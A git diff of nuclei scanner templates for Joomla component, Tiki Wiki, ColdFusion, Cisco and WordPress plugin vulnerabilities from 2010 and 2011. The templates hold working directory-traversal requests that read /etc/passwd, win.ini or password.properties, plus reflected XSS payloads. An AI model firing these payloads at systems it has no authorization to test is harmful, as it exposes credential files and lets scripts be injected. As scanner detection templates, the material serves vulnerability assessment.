"{{BaseURL}}/index.php?option=com_perchacategoriestree&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-2034.yaml b/nuclei-templates/CVE-2010/cve-2010-2034.yaml new file mode 100644 index 0000000000..4600c605a4 --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-2034.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-2034 + +info: + name: Joomla! Component Percha Image Attach 1.1 - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Percha Image Attach (com_perchaimageattach) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/34003 + - https://www.cvedetails.com/cve/CVE-2010-2034 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_perchaimageattach&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-2035.yaml b/nuclei-templates/CVE-2010/cve-2010-2035.yaml new file mode 100644 index 0000000000..d34c0bda56 --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-2035.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-2035 + +info: + name: Joomla! Component Percha Gallery 1.6 Beta - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Percha Gallery (com_perchagallery) component 1.6 Beta for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/34006 + - https://www.cvedetails.com/cve/CVE-2010-2035 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_perchagallery&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-2037.yaml b/nuclei-templates/CVE-2010/cve-2010-2037.yaml deleted file mode 100644 index e3db0ee030..0000000000 --- a/nuclei-templates/CVE-2010/cve-2010-2037.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2010-2037 - -info: - name: Joomla! Component Percha Downloads Attach 1.1 - Directory Traversal - author: daffainfo - severity: high - description: Directory traversal vulnerability in the Percha Downloads Attach (com_perchadownloadsattach) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/34005 - - https://www.cvedetails.com/cve/CVE-2010-2037 - tags: cve,cve2010,lfi,joomla - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_perchadownloadsattach&controller=../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-2122.yaml b/nuclei-templates/CVE-2010/cve-2010-2122.yaml new file mode 100644 index 0000000000..78a3fb66d0 --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-2122.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-2122 + +info: + name: Joomla! Component simpledownload 0.9.5 - Local File Disclosure + author: daffainfo + severity: high + description: Directory traversal vulnerability in the SimpleDownload (com_simpledownload) component before 0.9.6 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12623 + - https://www.cvedetails.com/cve/CVE-2010-2122 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_simpledownload&task=download&fileid=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-2128.yaml b/nuclei-templates/CVE-2010/cve-2010-2128.yaml new file mode 100644 index 0000000000..cf019f95a3 --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-2128.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-2128 + +info: + name: Joomla! Component JE Quotation Form 1.0b1 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the JE Quotation Form (com_jequoteform) component 1.0b1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the view parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/12607 + - https://www.cvedetails.com/cve/CVE-2010-2128 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jequoteform&view=../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2010/cve-2010-2259.yaml b/nuclei-templates/CVE-2010/cve-2010-2259.yaml new file mode 100644 index 0000000000..0d38e58882 --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-2259.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-2259 + +info: + name: Joomla! Component com_bfsurvey - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the BF Survey (com_bfsurvey) component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/10946 + - https://www.cvedetails.com/cve/CVE-2010-2259 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-2307.yaml b/nuclei-templates/CVE-2010/cve-2010-2307.yaml new file mode 100644 index 0000000000..d23c7cfd89 --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-2307.yaml @@ -0,0 +1,26 @@ +id: CVE-2010-2307 + +info: + name: Motorola SBV6120E SURFboard Digital Voice Modem SBV6X2X-1.0.0.5-SCM - Directory Traversal + author: daffainfo + severity: high + description: Multiple directory traversal vulnerabilities in the web server for Motorola SURFBoard cable modem SBV6120E running firmware SBV6X2X-1.0.0.5-SCM-02-SHPC allow remote attackers to read arbitrary files via (1) "//" (multiple leading slash), (2) ../ (dot dot) sequences, and encoded dot dot sequences in a URL request. + reference: + - https://www.securityfocus.com/bid/40550/info + - https://nvd.nist.gov/vuln/detail/CVE-2010-2307 + tags: cve,cve2010,iot,lfi,motorola + +requests: + - method: GET + path: + - "{{BaseURL}}/../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-2861.yaml b/nuclei-templates/CVE-2010/cve-2010-2861.yaml deleted file mode 100644 index 58f43f1fad..0000000000 --- a/nuclei-templates/CVE-2010/cve-2010-2861.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2010-2861 - -info: - name: Adobe ColdFusion 8.0/8.0.1/9.0/9.0.1 LFI - author: pikpikcu - severity: high - description: Multiple directory traversal vulnerabilities in the administrator console in Adobe ColdFusion 9.0.1 and earlier allow remote attackers to read arbitrary files via the locale parameter to (1) CFIDE/administrator/settings/mappings.cfm, (2) logging/settings.cfm, (3) datasources/index.cfm, (4) j2eepackaging/editarchive.cfm, and (5) enter.cfm in CFIDE/administrator/. - reference: - - https://github.com/vulhub/vulhub/tree/master/coldfusion/CVE-2010-2861 - - http://www.adobe.com/support/security/bulletins/apsb10-18.html - tags: cve,cve2010,coldfusion,lfi,adobe - -requests: - - method: GET - path: - - "{{BaseURL}}/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en" - - matchers-condition: and - matchers: - - - type: word - words: - - "rdspassword=" - - "encrypted=" - part: body - condition: and - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-3426.yaml b/nuclei-templates/CVE-2010/cve-2010-3426.yaml new file mode 100644 index 0000000000..9eece26cbd --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-3426.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-3426 + +info: + name: Joomla! Component Jphone 1.0 Alpha 3 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in jphone.php in the JPhone (com_jphone) component 1.0 Alpha 3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/14964 + - https://www.cvedetails.com/cve/CVE-2010-3426 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jphone&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-4239.yaml b/nuclei-templates/CVE-2010/cve-2010-4239.yaml new file mode 100644 index 0000000000..7f6b76880d --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-4239.yaml @@ -0,0 +1,45 @@ +id: CVE-2010-4239 + +info: + name: Tiki Wiki CMS Groupware 5.2 - Local File Inclusion + author: 0x_akoko + severity: critical + description: Tiki Wiki CMS Groupware 5.2 is susceptible to a local file inclusion vulnerability. + impact: | + The LFI vulnerability can lead to unauthorized access to sensitive files, potentially exposing sensitive information or allowing for further exploitation. + remediation: | + Upgrade Tiki Wiki CMS Groupware to a version that is not affected by the CVE-2010-4239 vulnerability. + reference: + - https://dl.packetstormsecurity.net/1009-exploits/tikiwiki52-lfi.txt + - https://www.openwall.com/lists/oss-security/2010/11/22/9 + - https://security-tracker.debian.org/tracker/CVE-2010-4239 + - https://nvd.nist.gov/vuln/detail/CVE-2010-4239 + - https://access.redhat.com/security/cve/cve-2010-4239 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2010-4239 + cwe-id: CWE-20 + epss-score: 0.03038 + epss-percentile: 0.90751 + cpe: cpe:2.3:a:tiki:tikiwiki_cms\/groupware:5.2:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: tiki + product: tikiwiki_cms\/groupware + tags: cve,cve2010,tikiwiki,lfi,tiki + +http: + - method: GET + path: + - "{{BaseURL}}/tiki-jsplugin.php?plugin=x&language=../../../../../../../../../../windows/win.ini" + + matchers: + - type: word + part: body + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and +# digest: 4a0a00473045022100b5b334a2fec00cf5a3aecc1339951bf57de03095d5f4265c23450b3a0c64bb5c02206338a21c9a89350f86820ccc9f08c7d37697834a200669fe085df7763d730318:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2010/cve-2010-4282.yaml b/nuclei-templates/CVE-2010/cve-2010-4282.yaml new file mode 100644 index 0000000000..889195c6eb --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-4282.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-4282 + +info: + name: phpShowtime 2.0 - Directory Traversal + author: daffainfo + severity: high + description: Multiple directory traversal vulnerabilities in Pandora FMS before 3.1.1 allow remote attackers to include and execute arbitrary local files via (1) the page parameter to ajax.php or (2) the id parameter to general/pandora_help.php, and allow remote attackers to include and execute, create, modify, or delete arbitrary local files via (3) the layout parameter to operation/agentes/networkmap.php. + reference: + - https://www.exploit-db.com/exploits/15643 + - https://www.cvedetails.com/cve/CVE-2010-4282 + tags: cve,cve2010,lfi,joomla,phpshowtime + +requests: + - method: GET + path: + - "{{BaseURL}}/pandora_console/ajax.php?page=../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-4617.yaml b/nuclei-templates/CVE-2010/cve-2010-4617.yaml new file mode 100644 index 0000000000..6b8918ae9b --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-4617.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-4617 + +info: + name: Joomla! Component JotLoader 2.2.1 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the JotLoader (com_jotloader) component 2.2.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/15791 + - https://www.cvedetails.com/cve/CVE-2010-4617 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jotloader§ion=../../../../../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-4719.yaml b/nuclei-templates/CVE-2010/cve-2010-4719.yaml new file mode 100644 index 0000000000..145fed21d3 --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-4719.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-4719 + +info: + name: Joomla! Component JRadio - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in JRadio (com_jradio) component before 1.5.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/15749 + - https://www.cvedetails.com/cve/CVE-2010-4719 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jradio&controller=../../../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2010/cve-2010-4769.yaml b/nuclei-templates/CVE-2010/cve-2010-4769.yaml deleted file mode 100644 index 3de9150cf4..0000000000 --- a/nuclei-templates/CVE-2010/cve-2010-4769.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2010-4769 - -info: - name: Joomla! Component Jimtawl 1.0.2 - Local File Inclusion - author: daffainfo - severity: high - description: Directory traversal vulnerability in the Jimtawl (com_jimtawl) component 1.0.2 Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the task parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/15585 - - https://www.cvedetails.com/cve/CVE-2010-4769 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_jimtawl&Itemid=12&task=../../../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2010/cve-2010-5278.yaml b/nuclei-templates/CVE-2010/cve-2010-5278.yaml new file mode 100644 index 0000000000..d0ad27b0a9 --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-5278.yaml @@ -0,0 +1,29 @@ +id: CVE-2010-5278 + +info: + name: MODx manager - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl, and possibly earlier, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key parameter. + reference: + - https://www.exploit-db.com/exploits/34788 + - https://www.cvedetails.com/cve/CVE-2010-5278 + tags: cve,cve2010,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and + part: body diff --git a/nuclei-templates/CVE-2011/CVE-2011-2744.yaml b/nuclei-templates/CVE-2011/CVE-2011-2744.yaml index c303e15090..041e731693 100644 --- a/nuclei-templates/CVE-2011/CVE-2011-2744.yaml +++ b/nuclei-templates/CVE-2011/CVE-2011-2744.yaml @@ -4,14 +4,10 @@ info: name: Chyrp 2.x - Local File Inclusion author: daffainfo severity: high - description: A directory traversal vulnerability in Chyrp 2.1 and earlier allows remote attackers to include and execute arbitrary local files via a ..%2F (encoded dot dot slash) in the action parameter to the default URI. + description: Directory traversal vulnerability in Chyrp 2.1 and earlier allows remote attackers to include and execute arbitrary local files via a ..%2F (encoded dot dot slash) in the action parameter to the default URI. reference: - https://www.exploit-db.com/exploits/35945 - https://www.cvedetails.com/cve/CVE-2011-2744 - - http://www.openwall.com/lists/oss-security/2011/07/13/6 - - http://secunia.com/advisories/45184 - classification: - cve-id: CVE-2011-2744 tags: cve,cve2011,lfi,chyrp requests: @@ -24,10 +20,8 @@ requests: - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" - type: status status: - - 200 - -# Enhanced by mp on 2022/02/18 + - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2011/CVE-2011-2780.yaml b/nuclei-templates/CVE-2011/CVE-2011-2780.yaml new file mode 100644 index 0000000000..6b3715bb3b --- /dev/null +++ b/nuclei-templates/CVE-2011/CVE-2011-2780.yaml @@ -0,0 +1,40 @@ +id: CVE-2011-2780 + +info: + name: Chyrp 2.x - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in includes/lib/gz.php in Chyrp 2.0 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter, a different vulnerability than CVE-2011-2744. + reference: + - http://www.justanotherhacker.com/advisories/JAHx113.txt + - http://www.openwall.com/lists/oss-security/2011/07/13/5 + - http://www.ocert.org/advisories/ocert-2011-001.html + - http://www.openwall.com/lists/oss-security/2011/07/13/6 + - http://www.securityfocus.com/bid/48672 + - http://secunia.com/advisories/45184 + - http://osvdb.org/73891 + - http://securityreason.com/securityalert/8312 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/68565 + - http://www.securityfocus.com/archive/1/518890/100/0/threaded + classification: + cve-id: CVE-2011-2780 + remediation: Upgrade to a supported version. + tags: cve,cve2011,lfi,chyrp + +requests: + - method: GET + path: + - "{{BaseURL}}/includes/lib/gz.php?file=/themes/../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/18 diff --git a/nuclei-templates/CVE-2011/CVE-2011-3315.yaml b/nuclei-templates/CVE-2011/CVE-2011-3315.yaml index f5589ecd62..855379ffba 100644 --- a/nuclei-templates/CVE-2011/CVE-2011-3315.yaml +++ b/nuclei-templates/CVE-2011/CVE-2011-3315.yaml @@ -4,14 +4,8 @@ info: name: Cisco CUCM, UCCX, and Unified IP-IVR- Directory Traversal author: daffainfo severity: high - description: A directory traversal vulnerability in Cisco Unified Communications Manager (CUCM) 5.x and 6.x before 6.1(5)SU2, 7.x before 7.1(5b)SU2, and 8.x before 8.0(3), and Cisco Unified Contact Center Express (aka Unified CCX or UCCX) and Cisco Unified IP Interactive Voice Response (Unified IP-IVR) before 6.0(1)SR1ES8, 7.0(x) before 7.0(2)ES1, 8.0(x) through 8.0(2)SU3, and 8.5(x) before 8.5(1)SU2, allows remote attackers to read arbitrary files via a crafted URL, aka Bug IDs CSCth09343 and CSCts44049. - reference: - - https://www.exploit-db.com/exploits/36256 - - http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20111026-uccx - - http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20111026-cucm - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2011-3315 + description: Directory traversal vulnerability in Cisco Unified Communications Manager (CUCM) 5.x and 6.x before 6.1(5)SU2, 7.x before 7.1(5b)SU2, and 8.x before 8.0(3), and Cisco Unified Contact Center Express (aka Unified CCX or UCCX) and Cisco Unified IP Interactive Voice Response (Unified IP-IVR) before 6.0(1)SR1ES8, 7.0(x) before 7.0(2)ES1, 8.0(x) through 8.0(2)SU3, and 8.5(x) before 8.5(1)SU2, allows remote attackers to read arbitrary files via a crafted URL, aka Bug IDs CSCth09343 and CSCts44049. + reference: https://www.exploit-db.com/exploits/36256 tags: cve,cve2011,lfi,cisco requests: @@ -24,10 +18,8 @@ requests: - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" - type: status status: - 200 - -# Enhanced by mp on 2022/02/18 diff --git a/nuclei-templates/CVE-2011/CVE-2011-4336.yaml b/nuclei-templates/CVE-2011/CVE-2011-4336.yaml deleted file mode 100644 index 43736129ab..0000000000 --- a/nuclei-templates/CVE-2011/CVE-2011-4336.yaml +++ /dev/null @@ -1,41 +0,0 @@ -id: CVE-2011-4336 - -info: - name: Tiki Wiki CMS Groupware 7.0 Cross-Site Scripting - author: pikpikcu - severity: medium - description: Tiki Wiki CMS Groupware 7.0 is vulnerable to cross-site scripting via the GET "ajax" parameter to snarf_ajax.php. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2011-4336 - - https://www.securityfocus.com/bid/48806/info - - https://seclists.org/bugtraq/2011/Nov/140 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2011-4336 - cwe-id: CWE-79 - remediation: Upgrade to a supported version. - tags: cve,cve2011,xss,tikiwiki - -requests: - - method: GET - path: - - "{{BaseURL}}/snarf_ajax.php?url=1&ajax=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - - matchers-condition: and - matchers: - - type: word - words: - - '' - part: body - - - type: status - status: - - 200 - - - type: word - part: header - words: - - text/html - -# Enhanced by mp on 2022/02/18 diff --git a/nuclei-templates/CVE-2011/cve-2011-4926.yaml b/nuclei-templates/CVE-2011/CVE-2011-4926.yaml similarity index 100% rename from nuclei-templates/CVE-2011/cve-2011-4926.yaml rename to nuclei-templates/CVE-2011/CVE-2011-4926.yaml diff --git a/nuclei-templates/CVE-2011/CVE-2011-5106.yaml b/nuclei-templates/CVE-2011/CVE-2011-5106.yaml deleted file mode 100644 index a1b5beded0..0000000000 --- a/nuclei-templates/CVE-2011/CVE-2011-5106.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2011-5106 - -info: - name: WordPress Plugin Flexible Custom Post Type < 0.1.7 - Reflected Cross-Site Scripting - author: daffainfo - severity: medium - description: A cross-site scripting vulnerability in edit-post.php in the Flexible Custom Post Type plugin before 0.1.7 for WordPress allows remote attackers to inject arbitrary web script or HTML via the id parameter. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2011-5106 - - https://wordpress.org/plugins/flexible-custom-post-type/#developers - - http://plugins.trac.wordpress.org/changeset?reponame=&new=466252%40flexible-custom-post-type&old=465583%40flexible-custom-post-type - - http://wordpress.org/extend/plugins/flexible-custom-post-type/changelog/ - classification: - cve-id: CVE-2011-5106 - tags: cve,cve2011,wordpress,xss,wp-plugin - -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/flexible-custom-post-type/edit-post.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/21 diff --git a/nuclei-templates/CVE-2011/cve-2011-5107.yaml b/nuclei-templates/CVE-2011/CVE-2011-5107.yaml similarity index 100% rename from nuclei-templates/CVE-2011/cve-2011-5107.yaml rename to nuclei-templates/CVE-2011/CVE-2011-5107.yaml diff --git a/nuclei-templates/CVE-2011/CVE-2011-5181.yaml b/nuclei-templates/CVE-2011/CVE-2011-5181.yaml deleted file mode 100644 index d50e65e43c..0000000000 --- a/nuclei-templates/CVE-2011/CVE-2011-5181.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2011-5181 - -info: - name: ClickDesk Live Support Live Chat 2.0 - Reflected Cross-Site Scripting - author: daffainfo - severity: medium - description: A cross-site scripting vulnerability in clickdesk.php in ClickDesk Live Support - Live Chat plugin 2.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cdwidgetid parameter. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2011-5181 - - http://www.securityfocus.com/bid/50778 - - http://wordpress.org/extend/plugins/clickdesk-live-support-chat-plugin/changelog/ - - http://osvdb.org/77338 - classification: - cve-id: CVE-2011-5181 - tags: cve,cve2011,wordpress,xss,wp-plugin - -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/21 diff --git a/nuclei-templates/CVE-2011/CVE-2011-5265.yaml b/nuclei-templates/CVE-2011/CVE-2011-5265.yaml deleted file mode 100644 index 63641aacf6..0000000000 --- a/nuclei-templates/CVE-2011/CVE-2011-5265.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2011-5265 - -info: - name: Featurific For WordPress 1.6.2 - Reflected Cross-Site Scripting - author: daffainfo - severity: medium - description: A cross-site scripting vulnerability in cached_image.php in the Featurific For WordPress plugin 1.6.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the snum parameter. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2011-5265 - - http://osvdb.org/77337 - - http://www.securityfocus.com/bid/50779 - - http://archives.neohapsis.com/archives/bugtraq/2012-04/0120.html - classification: - cve-id: CVE-2011-5265 - tags: cve,cve2011,wordpress,xss,wp-plugin - -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/21 diff --git a/nuclei-templates/CVE-2011/cve-2011-2780.yaml b/nuclei-templates/CVE-2011/cve-2011-2780.yaml deleted file mode 100644 index 1cb0a0ac54..0000000000 --- a/nuclei-templates/CVE-2011/cve-2011-2780.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: CVE-2011-2780 - -info: - name: Chyrp 2.x - Local File Inclusion (LFI) - author: daffainfo - severity: high - tags: cve,cve2011,lfi,chyrp - description: "Directory traversal vulnerability in includes/lib/gz.php in Chyrp 2.0 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter, a different vulnerability than CVE-2011-2744." - reference: - - http://www.justanotherhacker.com/advisories/JAHx113.txt - - http://www.openwall.com/lists/oss-security/2011/07/13/5 - - http://www.ocert.org/advisories/ocert-2011-001.html - - http://www.openwall.com/lists/oss-security/2011/07/13/6 - - http://www.securityfocus.com/bid/48672 - - http://secunia.com/advisories/45184 - - http://osvdb.org/73891 - - http://securityreason.com/securityalert/8312 - - https://exchange.xforce.ibmcloud.com/vulnerabilities/68565 - - http://www.securityfocus.com/archive/1/518890/100/0/threaded - -requests: - - method: GET - path: - - "{{BaseURL}}/includes/lib/gz.php?file=/themes/../../../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2011/cve-2011-4336.yaml b/nuclei-templates/CVE-2011/cve-2011-4336.yaml new file mode 100644 index 0000000000..1fe124e5d4 --- /dev/null +++ b/nuclei-templates/CVE-2011/cve-2011-4336.yaml @@ -0,0 +1,38 @@ +id: CVE-2011-4336 + +info: + name: Tiki Wiki CMS Groupware 7.0 has XSS + author: pikpikcu + severity: medium + description: Tiki Wiki CMS Groupware 7.0 has XSS via the GET "ajax" parameter to snarf_ajax.php. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2011-4336 + - https://www.securityfocus.com/bid/48806/info + - https://seclists.org/bugtraq/2011/Nov/140 + tags: cve,cve2011,xss,tikiwiki + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2011-4336 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - "{{BaseURL}}/snarf_ajax.php?url=1&ajax=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - '' + part: body + + - type: status + status: + - 200 + + - type: word + part: header + words: + - text/html diff --git a/nuclei-templates/CVE-2011/cve-2011-5106.yaml b/nuclei-templates/CVE-2011/cve-2011-5106.yaml new file mode 100644 index 0000000000..fb203bd625 --- /dev/null +++ b/nuclei-templates/CVE-2011/cve-2011-5106.yaml @@ -0,0 +1,30 @@ +id: CVE-2011-5106 + +info: + name: WordPress Plugin Flexible Custom Post Type < 0.1.7 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: Cross-site scripting (XSS) vulnerability in edit-post.php in the Flexible Custom Post Type plugin before 0.1.7 for WordPress allows remote attackers to inject arbitrary web script or HTML via the id parameter. + reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5106 + tags: cve,cve2011,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/flexible-custom-post-type/edit-post.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + 